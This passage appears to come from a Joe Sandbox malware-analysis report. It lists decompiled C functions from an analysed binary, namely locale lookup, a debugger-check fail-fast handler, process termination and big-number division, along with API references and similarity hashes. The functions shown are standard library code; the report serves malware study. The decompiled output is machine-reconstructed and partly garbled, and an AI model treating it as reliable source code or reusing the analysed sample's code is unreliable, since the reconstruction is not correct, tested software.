                                                                                                                                                                          0x00a0e89c
                                                                                                                                                                          0x00a0e8a5
                                                                                                                                                                          0x00a0e913
                                                                                                                                                                          0x00a0e916
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e918
                                                                                                                                                                          0x00a0e91b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e92e
                                                                                                                                                                          0x00a0e930
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e932
                                                                                                                                                                          0x00a0e933
                                                                                                                                                                          0x00a0e937
                                                                                                                                                                          0x00a0e93f
                                                                                                                                                                          0x00a0e941
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e943
                                                                                                                                                                          0x00a0e949
                                                                                                                                                                          0x00a0e94c
                                                                                                                                                                          0x00a0e94c
                                                                                                                                                                          0x00a0e94e
                                                                                                                                                                          0x00a0e94e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e94c
                                                                                                                                                                          0x00a0e8a9
                                                                                                                                                                          0x00a0e8af
                                                                                                                                                                          0x00a0e8b4
                                                                                                                                                                          0x00a0e8c6
                                                                                                                                                                          0x00a0e8c9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e8cb
                                                                                                                                                                          0x00a0e8d1
                                                                                                                                                                          0x00a0e8d7
                                                                                                                                                                          0x00a0e8d7
                                                                                                                                                                          0x00a0e8da
                                                                                                                                                                          0x00a0e8dd
                                                                                                                                                                          0x00a0e8dd
                                                                                                                                                                          0x00a0e8ec
                                                                                                                                                                          0x00a0e8ee
                                                                                                                                                                          0x00a0e8f1
                                                                                                                                                                          0x00a0e90d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e90d
                                                                                                                                                                          0x00a0e8f3
                                                                                                                                                                          0x00a0e8f7
                                                                                                                                                                          0x00a0e8ff
                                                                                                                                                                          0x00a0e901
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e903
                                                                                                                                                                          0x00a0e909
                                                                                                                                                                          0x00a0e8be
                                                                                                                                                                          0x00a0e8be
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e8be
                                                                                                                                                                          0x00a0e8b6
                                                                                                                                                                          0x00a0e8bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e8bc
                                                                                                                                                                          0x00a0e7b0
                                                                                                                                                                          0x00a0e7c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e7d6
                                                                                                                                                                          0x00a0e7dd
                                                                                                                                                                          0x00a0e7e1
                                                                                                                                                                          0x00a0e7f0
                                                                                                                                                                          0x00a0e7f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e7f5
                                                                                                                                                                          0x00a0e7f9
                                                                                                                                                                          0x00a0e83d
                                                                                                                                                                          0x00a0e83d
                                                                                                                                                                          0x00a0e83f
                                                                                                                                                                          0x00a0e842
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e845
                                                                                                                                                                          0x00a0e84b
                                                                                                                                                                          0x00a0e84d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e84f
                                                                                                                                                                          0x00a0e84f
                                                                                                                                                                          0x00a0e852
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e852
                                                                                                                                                                          0x00a0e808
                                                                                                                                                                          0x00a0e80d
                                                                                                                                                                          0x00a0e810
                                                                                                                                                                          0x00a0e812
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e814
                                                                                                                                                                          0x00a0e814
                                                                                                                                                                          0x00a0e817
                                                                                                                                                                          0x00a0e81a
                                                                                                                                                                          0x00a0e81d
                                                                                                                                                                          0x00a0e820
                                                                                                                                                                          0x00a0e820
                                                                                                                                                                          0x00a0e823
                                                                                                                                                                          0x00a0e826
                                                                                                                                                                          0x00a0e826
                                                                                                                                                                          0x00a0e833
                                                                                                                                                                          0x00a0e836
                                                                                                                                                                          0x00a0e838
                                                                                                                                                                          0x00a0e838
                                                                                                                                                                          0x00a0e7e3
                                                                                                                                                                          0x00a0e7e9
                                                                                                                                                                          0x00a0e7ec
                                                                                                                                                                          0x00a0e854
                                                                                                                                                                          0x00a0e854
                                                                                                                                                                          0x00a0e854

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04232
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04268
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A0E774
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A0E7BE
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A0E884
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale$ErrorLast_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3140898709-0
                                                                                                                                                                          • Opcode ID: bf3a5aa2faecd91cc6b05972c37c15b373e80868058f69cd9655cbc138b9385e
                                                                                                                                                                          • Instruction ID: dc8b707f751799bcb60627b73b7325b6ed6afab5c7d733fc2aaa5e177aabaea5
                                                                                                                                                                          • Opcode Fuzzy Hash: bf3a5aa2faecd91cc6b05972c37c15b373e80868058f69cd9655cbc138b9385e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1061A17290010B9FDB68DF24ED82BBAB7A8EF04340F14857AE905C61C1EB34D994EB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FCA23 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                          			E009FCA23(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xa44bac; // 0x96877b9b
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E009F9369(_t41);
					_pop(_t61);
				}
				E009FA270(_t66,  &_v804, 0, 0x50);
				E009FA270(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0xf4458d00
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x9f6bb7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xa20f7c68
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cc0000
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0xf4458d00
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x9f688b
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0x2cfee850
					_push( *_t38);
					_t57 = E009F9369(_t57);
				}
				_t39 =  &_v8; // 0xffffff12
				return E009F8F7D(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}






































                                                                                                                                                                          0x009fca23
                                                                                                                                                                          0x009fca23
                                                                                                                                                                          0x009fca23
                                                                                                                                                                          0x009fca2e
                                                                                                                                                                          0x009fca33
                                                                                                                                                                          0x009fca35
                                                                                                                                                                          0x009fca3d
                                                                                                                                                                          0x009fca3f
                                                                                                                                                                          0x009fca42
                                                                                                                                                                          0x009fca47
                                                                                                                                                                          0x009fca47
                                                                                                                                                                          0x009fca53
                                                                                                                                                                          0x009fca66
                                                                                                                                                                          0x009fca74
                                                                                                                                                                          0x009fca7a
                                                                                                                                                                          0x009fca80
                                                                                                                                                                          0x009fca86
                                                                                                                                                                          0x009fca8c
                                                                                                                                                                          0x009fca92
                                                                                                                                                                          0x009fca98
                                                                                                                                                                          0x009fca9e
                                                                                                                                                                          0x009fcaa4
                                                                                                                                                                          0x009fcaaa
                                                                                                                                                                          0x009fcab1
                                                                                                                                                                          0x009fcab8
                                                                                                                                                                          0x009fcabf
                                                                                                                                                                          0x009fcac6
                                                                                                                                                                          0x009fcacd
                                                                                                                                                                          0x009fcad4
                                                                                                                                                                          0x009fcad5
                                                                                                                                                                          0x009fcadb
                                                                                                                                                                          0x009fcade
                                                                                                                                                                          0x009fcae4
                                                                                                                                                                          0x009fcae4
                                                                                                                                                                          0x009fcae7
                                                                                                                                                                          0x009fcaed
                                                                                                                                                                          0x009fcaf7
                                                                                                                                                                          0x009fcafa
                                                                                                                                                                          0x009fcb00
                                                                                                                                                                          0x009fcb03
                                                                                                                                                                          0x009fcb09
                                                                                                                                                                          0x009fcb0c
                                                                                                                                                                          0x009fcb12
                                                                                                                                                                          0x009fcb15
                                                                                                                                                                          0x009fcb23
                                                                                                                                                                          0x009fcb25
                                                                                                                                                                          0x009fcb2b
                                                                                                                                                                          0x009fcb3a
                                                                                                                                                                          0x009fcb46
                                                                                                                                                                          0x009fcb46
                                                                                                                                                                          0x009fcb49
                                                                                                                                                                          0x009fcb4e
                                                                                                                                                                          0x009fcb4f
                                                                                                                                                                          0x009fcb5b

                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 009FCB1B
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 009FCB25
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(009F688B,?,?,?,?,?,00000001), ref: 009FCB32
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 8a4c5d9a5d1e6ad900196a74af2ac8680834b71913f2d1ac4f3c31120dbe05c6
                                                                                                                                                                          • Instruction ID: 33343c0dcd18cb553b113c9f9a72c950a9d0061847342712884f898fcb3eeb44
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a4c5d9a5d1e6ad900196a74af2ac8680834b71913f2d1ac4f3c31120dbe05c6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4531C6B490121CABCB21DF68D989BDDBBB8BF48311F5041DAE51CA7250E7749F858F44
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A016F9 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A016F9(int _a4) {
				void* _t14;

				if(E00A0C8CA(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00A0173B(_t14, _a4);
				ExitProcess(_a4);
			}




                                                                                                                                                                          0x00a01706
                                                                                                                                                                          0x00a01722
                                                                                                                                                                          0x00a01722
                                                                                                                                                                          0x00a0172b
                                                                                                                                                                          0x00a01734

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00A016F8,?,00000000,?,?,?,00A06982), ref: 00A0171B
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00A016F8,?,00000000,?,?,?,00A06982), ref: 00A01722
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00A01734
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 8154b45ce4e664f0f5b61ea2a15a51edcfccc97e3171e5ae1adf29422fe879cb
                                                                                                                                                                          • Instruction ID: 17b7bc9163051a8489d70fd85e12518f8ab5ece9733073ef326faedc12b50f12
                                                                                                                                                                          • Opcode Fuzzy Hash: 8154b45ce4e664f0f5b61ea2a15a51edcfccc97e3171e5ae1adf29422fe879cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 09E0463600050CAFCB11ABA9FD48A983BA8FB08382B048414F9058A171CB3ADC43CB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A00050 Relevance: 3.4, APIs: 2, Instructions: 450COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                          			E00A00050(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t289 = _a8;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t277 =  &(_t244[_t253 + 1]);
									_t341 = _a8 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xfffef5c1
									_t254 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t221 = E00A13480(_t296, _v16, _t303);
												_t261 = _v16;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E00A133E0(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E009F8A10(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E009F8A10(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t251 = 0;
															_t299 = _v64;
															_t334 = _a8 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t161 = _t334 + 4; // 0x8d8b5959
																_t334 = _t161;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t313 = _v16;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t7 = _t289 + 4; // 0xfffff89c
							_t304 =  *_t7;
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E00A133E0( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E009FF705(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E009FF705(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E009FF705( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}




















































































                                                                                                                                                                          0x00a0005c
                                                                                                                                                                          0x00a00061
                                                                                                                                                                          0x00a00065
                                                                                                                                                                          0x00a004df
                                                                                                                                                                          0x00a004e1
                                                                                                                                                                          0x00a004e7
                                                                                                                                                                          0x00a0006b
                                                                                                                                                                          0x00a0006b
                                                                                                                                                                          0x00a0006e
                                                                                                                                                                          0x00a00070
                                                                                                                                                                          0x00a00075
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0007b
                                                                                                                                                                          0x00a0007b
                                                                                                                                                                          0x00a0007e
                                                                                                                                                                          0x00a0007e
                                                                                                                                                                          0x00a00081
                                                                                                                                                                          0x00a00086
                                                                                                                                                                          0x00a001b7
                                                                                                                                                                          0x00a001b9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001bf
                                                                                                                                                                          0x00a001c1
                                                                                                                                                                          0x00a001c3
                                                                                                                                                                          0x00a001c5
                                                                                                                                                                          0x00a001c7
                                                                                                                                                                          0x00a001eb
                                                                                                                                                                          0x00a001eb
                                                                                                                                                                          0x00a001eb
                                                                                                                                                                          0x00a001c9
                                                                                                                                                                          0x00a001d0
